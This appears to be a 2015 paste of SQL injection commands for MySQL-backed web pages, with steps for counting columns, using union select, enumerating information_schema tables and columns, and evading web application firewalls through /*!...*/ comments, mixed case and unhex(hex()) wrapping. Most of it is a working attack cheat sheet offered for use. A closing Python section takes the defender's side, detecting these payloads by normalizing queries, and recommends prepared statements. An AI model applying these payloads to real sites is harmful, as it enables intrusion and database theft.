YASSINOXTN

bypass sql injection waf

Jun 7th, 2015
==============================
SQL Injection Commands
==============================
Get column count
==============================
+order+by+
==============================
Get infected column
==============================
+union+select+
==============================
Get database name
==============================
Database()
==============================
Get database version
==============================
Version()
==============================
Get database user
==============================
User()
==============================
Get all tables
==============================
Place this command in the infected column
==============================
group_concat(table_name)
==============================
Place this command at the end of the URL
==============================
+from+information_schema.tables+where+table_schema=database()--
==============================
Get all columns
==============================
Place this command in the infected column
==============================
group_concat(column_name)
==============================
Place this one at the end of the link
==============================
+from+information_schema.columns+where+table_schema=database()--
==============================
Bypass WAF
==============================
Union Select WAF bypass
==============================
Add this filter
==============================
/*! */
==============================
to
==============================
select
==============================
to be
==============================
/*!select*/
==============================
If that was not successful, change this
==============================
select
==============================
to
==============================
/*!SeLeCt*/
==============================
Capital and small letters
==============================
Bypass WAF when getting tables
==============================
Change this
==============================
select
==============================
to this
==============================
/*!SeLeCt*/
==============================
and this
==============================
group_concat(table_name)
==============================
to this
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
and place this at the end of the URL
==============================
+from+information_schema.tables+where+table_schema=database()--
==============================
Bypass WAF when getting columns
==============================
Change this
==============================
select
==============================
to this
==============================
/*!SeLeCt*/
==============================
Change this
==============================
group_concat(column_name)
==============================
to this
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
and place this at the end of the link
==============================
+from+information_schema.columns+where+table_schema=database()--
==============================
to be like this
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
Additional command for WAF bypass
==============================
Place this in the infected column
==============================
concat(unhex(hex(concat(table_name,0x3a,column_name,0x3a,table_schema))))
==============================
and place this at the end of the link
==============================
+from+information_schema.columns--
==============================
Column count can't be shown?
==============================
Add this
==============================
+--+
==============================
to the end of the URL
==============================
and add this
==============================
'
==============================
after
==============================
.php?id=1
==============================
to be like this
==============================
.php?id=1'
==============================
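Seen from the filter's side, the /*! */ wrapping and mixed-case rewrites listed above stop working once the request is normalized the way MySQL reads it before any signature is applied. The sketch below is an added example, not part of the original paste: the function names, signature set and sample query strings are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# /*!...*/ and /*!50000...*/ are MySQL executable comments: the server runs
# the body, so a filter has to unwrap them instead of discarding them.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Signatures are written against the normalized (lower-case) form only.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "hex_roundtrip": re.compile(r"\bunhex\s*\(\s*hex\s*\("),
}

def normalize(raw_query):
    """Reduce a raw query string to the text the database would parse."""
    text = unquote_plus(raw_query)        # '+' and %xx become real characters
    text = VERSIONED.sub(r" \1 ", text)   # keep the body MySQL would execute
    text = PLAIN_COMMENT.sub(" ", text)   # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", text).lower().strip()

def naive_keyword_filter(raw_query):
    """Models the case-sensitive substring filter the paste is written against."""
    return "union+select" in raw_query or "union select" in raw_query

def detect(raw_query):
    """Return the sorted names of every signature matching the normalized query."""
    norm = normalize(raw_query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))

# Constructed sample query strings (not captured traffic).
PLAIN = "id=1+union+select+1,2,3--"
WRAPPED = ("id=1+union+/*!SeLeCt*/+1,/*!GrOuP_CoNcAT(table_name)*/,3"
           "+from+information_schema./*!tables*/+where+table_schema=database()--")
PROBE = "id=1+order+by+5--"
BENIGN = "id=42&sort=name"

if __name__ == "__main__":
    for sample in (PLAIN, WRAPPED, PROBE, BENIGN):
        print(naive_keyword_filter(sample), detect(sample))
```

Matching of this kind is a backstop for logging and alerting; the id parameter itself should be bound through a prepared statement so that none of these strings is ever parsed as SQL.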